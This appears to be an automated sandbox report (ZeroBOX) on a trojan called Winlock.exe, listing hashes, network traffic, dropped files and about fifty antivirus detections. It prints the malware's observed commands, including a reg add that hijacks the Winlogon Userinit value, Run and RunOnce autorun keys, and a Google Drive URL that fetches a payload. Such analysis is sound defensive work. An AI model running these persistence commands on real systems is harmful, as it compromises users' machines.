Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Dec. 11, 2023, 7:16 p.m.	Dec. 11, 2023, 7:35 p.m.

Size	3.0MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`18563c62462e92e3c81dfe737e3a8997`
SHA256	`3e84a1296556efb107c12d4b936b0e1a1a7a5a70d6ecd3ed7ecff79e4b39bd54`
CRC32	`8DD6B28C`
ssdeep	`49152:88ntDZAcCVT1ZgESZlkBg9HCx6CtcX4EwgGW7XoUPIwEi2xQwqM:vZAcCKMECuX4EwN0RIzxQc`
Yara	Malicious_Library_Zero - Malicious_Library IsPE32 - (no description) Win32_Trojan_Emotet_2_Zero - Win32 Trojan Emotet PE_Header_Zero - PE File Signature UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

Winlock.exe "C:\Users\test22\AppData\Local\Temp\Winlock.exe"
840
- cmd.exe "C:\Windows\System32\cmd.exe" /V/K reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Pbl32b53obP3FbbCxbibhb9383YbV3.exe" /f
  2192
  - reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Pbl32b53obP3FbbCxbibhb9383YbV3.exe" /f
    2292

Name	Response	Post-Analysis Lookup
doc-0c-bs-docs.googleusercontent.com	CNAME googlehosted.l.googleusercontent.com A 142.251.220.97	142.250.207.97
drive.google.com	A 142.251.220.78	142.250.206.206

IP Address	Status	Action
142.251.220.78	Active	Moloch
142.251.220.97	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49168 -> 142.251.220.97:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49165 -> 142.251.220.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49168 142.251.220.97:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.googleusercontent.com	17:e3:6e:db:3c:c4:0e:b4:6d:d3:55:1a:70:f8:0b:23:86:54:69:d8
TLSv1 192.168.56.103:49165 142.251.220.78:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	5d:3a:d9:47:14:b0:78:30:a1:bf:b4:45:f6:f5:81:ad:0a:c7:76:89

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Dec. 11, 2023, 7:16 p.m.	computer_name: TEST22-PC	1	1

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1	0
WriteConsoleW Dec. 11, 2023, 7:16 p.m.	buffer: ERROR: Registry editing has been disabled by your administrator. console_handle: 0x0000000b	1	1	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Dec. 11, 2023, 7:16 p.m.		1	1	0

Performs some HTTP requests (2 events)

request	GET https://drive.google.com/uc?export=download&confirm=no_antivirus&id=1BnLwNXIOB1ed0vfig76FOiB5_vSYfxO8
request	GET https://doc-0c-bs-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/gsj07kmmd732u9jfj0sd2ubl6lqnbh2o/1702290825000/03617822427045637603/*/1BnLwNXIOB1ed0vfig76FOiB5_vSYfxO8?e=download&uuid=cd74acaf-b34e-46e0-a195-a721074feb84

Downloads a file or document from Google Drive (1 event)

domain

drive.google.com

Creates executable files on the filesystem (6 events)

file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\mmf2d3d8.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pbl32b53obP3FbbCxbibhb9383YbV3.exe
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\mmf2d3d9.dll
file	C:\Windows\System32\drivers\Pbl32b53obP3FbbCxbibhb9383YbV3.exe
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\mmf2d3d11.dll
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\mmfs2.dll

Creates a suspicious process (2 events)

cmdline	"C:\Windows\System32\cmd.exe" /V/K reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Pbl32b53obP3FbbCxbibhb9383YbV3.exe" /f
cmdline	cmd.exe /V/K reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Pbl32b53obP3FbbCxbibhb9383YbV3.exe" /f

Drops an executable to the user AppData folder (16 events)

file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\RunInConsole.mfx
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\GetKillProcess.mfx
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\ctrlx.mfx
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\InternetConnectionOperations.mfx
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\kcwctrl.mfx
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\mmf2d3d9.dll
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\mmf2d3d8.dll
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pbl32b53obP3FbbCxbibhb9383YbV3.exe
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\mmfs2.dll
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\Encryption.mfx
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\kcfile.mfx
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\Registry2.mfx
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\mmf2d3d11.dll
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\KcSyso.mfx
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\Get.mfx
file	C:\Users\test22\AppData\Local\Temp\3ce01f1a-399d-48b4-bb76-b82713c7c122.FusionApp\kcedit.mfx

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Dec. 11, 2023, 7:16 p.m.	show_type: 0 filepath_r: cmd.exe parameters: /V/K reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Pbl32b53obP3FbbCxbibhb9383YbV3.exe" /f filepath: cmd.exe	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (49 events)

Time & API	Arguments	Status	Return
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: smss.exe process_identifier: 232	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: csrss.exe process_identifier: 308	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: wininit.exe process_identifier: 344	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: csrss.exe process_identifier: 356	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: winlogon.exe process_identifier: 392	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: services.exe process_identifier: 436	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: lsass.exe process_identifier: 452	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: svchost.exe process_identifier: 560	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: svchost.exe process_identifier: 636	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: svchost.exe process_identifier: 716	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: svchost.exe process_identifier: 780	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: svchost.exe process_identifier: 824	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: audiodg.exe process_identifier: 896	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: svchost.exe process_identifier: 984	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: svchost.exe process_identifier: 340	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: spoolsv.exe process_identifier: 1060	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: taskhost.exe process_identifier: 1112	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: svchost.exe process_identifier: 1120	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: dwm.exe process_identifier: 1192	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: explorer.exe process_identifier: 1236	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: svchost.exe process_identifier: 1744	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: pw.exe process_identifier: 1888	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: SearchIndexer.exe process_identifier: 1652	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: mobsync.exe process_identifier: 1664	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: pw.exe process_identifier: 1684	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: taskhost.exe process_identifier: 1476	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: cmd.exe process_identifier: 804	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: SearchProtocolHost.exe process_identifier: 1884	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: conhost.exe process_identifier: 1836	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: SearchFilterHost.exe process_identifier: 1076	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: Winlock.exe process_identifier: 840	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: pw.exe process_identifier: 872	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: cmd.exe process_identifier: 2192	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: conhost.exe process_identifier: 2228	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004e0 process_name: explorer.exe process_identifier: 2268	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004ec process_name: reg.exe process_identifier: 2292	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004ec process_name: inject-x86.exe process_identifier: 2316	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000002fc process_name: mscorsvw.exe process_identifier: 2452	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000002fc process_name: svchost.exe process_identifier: 2488	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000002f4 process_name: sppsvc.exe process_identifier: 2592	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000002f8 process_name: cmd.exe process_identifier: 2676	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000002f8 process_name: conhost.exe process_identifier: 2684	1	1
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000002f8 process_name: pw.exe process_identifier: 2708	1	1
Process32NextW Dec. 11, 2023, 7:17 p.m.	snapshot_handle: 0x00000180 process_name: cmd.exe process_identifier: 2752	1	1
Process32NextW Dec. 11, 2023, 7:17 p.m.	snapshot_handle: 0x00000180 process_name: conhost.exe process_identifier: 2760	1	1
Process32NextW Dec. 11, 2023, 7:17 p.m.	snapshot_handle: 0x00000180 process_name: pw.exe process_identifier: 2784	1	1
Process32NextW Dec. 11, 2023, 7:17 p.m.	snapshot_handle: 0x00000258 process_name: cmd.exe process_identifier: 2812	1	1
Process32NextW Dec. 11, 2023, 7:17 p.m.	snapshot_handle: 0x00000258 process_name: conhost.exe process_identifier: 2820	1	1
Process32NextW Dec. 11, 2023, 7:17 p.m.	snapshot_handle: 0x00000258 process_name: pw.exe process_identifier: 2844	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Dec. 11, 2023, 7:16 p.m.	process_identifier: 840 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0xfff80000 process_handle: 0xffffffff	1	0	0

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (50 out of 1916 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d0 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004c0 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004d4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004e8 process_name: explorer.exe process_identifier: 2268		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004e8 process_name: explorer.exe process_identifier: 2268		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004e8 process_name: explorer.exe process_identifier: 2268		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004ec process_name: inject-x86.exe process_identifier: 2316		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004ec process_name: inject-x86.exe process_identifier: 2316		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004ec process_name: inject-x86.exe process_identifier: 2316		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004ec process_name: inject-x86.exe process_identifier: 2316		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000540 process_name: reg.exe process_identifier: 2292		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000540 process_name: reg.exe process_identifier: 2292		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000540 process_name: reg.exe process_identifier: 2292		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000540 process_name: reg.exe process_identifier: 2292		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000554 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000554 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000554 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000554 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000604 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000604 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000604 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x00000604 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000006c4 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004e8 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004e8 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004e8 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000004e8 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000003f8 process_name: conhost.exe process_identifier: 2228		0	0
Process32NextW Dec. 11, 2023, 7:16 p.m.	snapshot_handle: 0x000003f8 process_name: conhost.exe process_identifier: 2228		0	0

Terminates another process (8 events)

Time & API	Arguments	Status
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0x00000009 process_identifier: 1236 process_handle: 0x000004cc
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0x00000009 process_identifier: 1236 process_handle: 0x000004cc	1
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0x00000009 process_identifier: 1236 process_handle: 0x000004cc
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0x00000009 process_identifier: 1236 process_handle: 0x000004cc	1
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0x00000009 process_identifier: 1236 process_handle: 0x000004d0
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0x00000009 process_identifier: 1236 process_handle: 0x000004d0	1
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0x00000009 process_identifier: 2268 process_handle: 0x000004e4
NtTerminateProcess Dec. 11, 2023, 7:16 p.m.	status_code: 0x00000009 process_identifier: 2268 process_handle: 0x000004e4	1

Uses Windows utilities for basic Windows functionality (3 events)

cmdline	"C:\Windows\System32\cmd.exe" /V/K reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Pbl32b53obP3FbbCxbibhb9383YbV3.exe" /f
cmdline	reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Pbl32b53obP3FbbCxbibhb9383YbV3.exe" /f
cmdline	cmd.exe /V/K reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v Userinit /t REG_SZ /d "C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Pbl32b53obP3FbbCxbibhb9383YbV3.exe" /f

Installs itself for autorun at Windows startup (6 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit	reg_value	C:\Windows\system32\userinit.exe, C:\Windows\system32\drivers\Pbl32b53obP3FbbCxbibhb9383YbV3.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Pbl32b53obP3FbbCxbibhb9383YbV3	reg_value	"C:\Users\test22\AppData\Local\Temp\Winlock.exe" -startup
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Pbl32b53obP3FbbCxbibhb9383YbV3	reg_value	"C:\Users\test22\AppData\Local\Temp\Winlock.exe" -startup
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\*Pbl32b53obP3FbbCxbibhb9383YbV3	reg_value	"C:\Users\test22\AppData\Local\Temp\Winlock.exe" -startup
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\*Pbl32b53obP3FbbCxbibhb9383YbV3	reg_value	"C:\Users\test22\AppData\Local\Temp\Winlock.exe" -startup
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Pbl32b53obP3FbbCxbibhb9383YbV3.exe

Disables Windows' Task Manager (1 event)

registry

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Expresses interest in specific running processes (1 event)

process: potential process injection target

explorer.exe

File has been identified by 51 AntiVirus engines on VirusTotal as malicious (50 out of 51 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Diztakun.4!c
MicroWorld-eScan	Trojan.Generic.34137464
FireEye	Trojan.Generic.34137464
Skyhigh	BehavesLike.Win32.Generic.vc
ALYac	Trojan.Generic.34137464
Malwarebytes	Malware.AI.3516840452
Zillya	Trojan.Sdum.Win32.10190
K7AntiVirus	Riskware ( 00584baa1 )
Alibaba	Trojan:Win32/Diztakun.b618db43
K7GW	Riskware ( 00584baa1 )
CrowdStrike	win/malicious_confidence_100% (W)
Symantec	ML.Attribute.HighConfidence
Elastic	malicious (high confidence)
ClamAV	Win.Malware.Sdum-10013178-0
Kaspersky	Trojan.Win32.Diztakun.bzti
BitDefender	Trojan.Generic.34137464
NANO-Antivirus	Trojan.Win32.Dwn.jvlqmk
Avast	FileRepMalware [Misc]
Tencent	Malware.Win32.Gencirc.13f011aa
Emsisoft	Trojan.Generic.34137464 (B)
F-Secure	Trojan.TR/Diztakun.rjbkp
DrWeb	Trojan.DownLoader45.53017
VIPRE	Trojan.Generic.34137464
TrendMicro	TROJ_GEN.R002C0XIQ23
Sophos	Mal/Generic-S
Jiangmin	Trojan.Sdum.anm
Webroot	W32.Trojan.Gen
Google	Detected
Avira	TR/Diztakun.rjbkp
Varist	W32/ABRisk.FJKY-1849
Kingsoft	Win32.Trojan.Diztakun.bzti
Microsoft	Trojan:Win32/Wacatac.B!ml
Gridinsoft	Trojan.Win32.Downloader.oa!s1
Arcabit	Trojan.Generic.D208E578
ZoneAlarm	Trojan.Win32.Diztakun.bzti
GData	Trojan.Generic.34137464
Cynet	Malicious (score: 100)
AhnLab-V3	Trojan/Win.Diztakun.C5558500
McAfee	Artemis!18563C62462E
MAX	malware (ai score=87)
VBA32	Win32.Malware.Dropper.Heur
Cylance	unsafe
Panda	Trj/Chgt.AD
TrendMicro-HouseCall	TROJ_GEN.R002C0XIQ23
Rising	Trojan.Generic@AI.100 (RDMK:gIh9sbX/ufqsVZIi1PeOOQ)
Ikarus	Trojan.Win32.Agent
MaxSecure	Trojan.Malware.218560459.susgen
Fortinet	Malicious_Behavior.SB
AVG	FileRepMalware [Misc]

Winlock.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All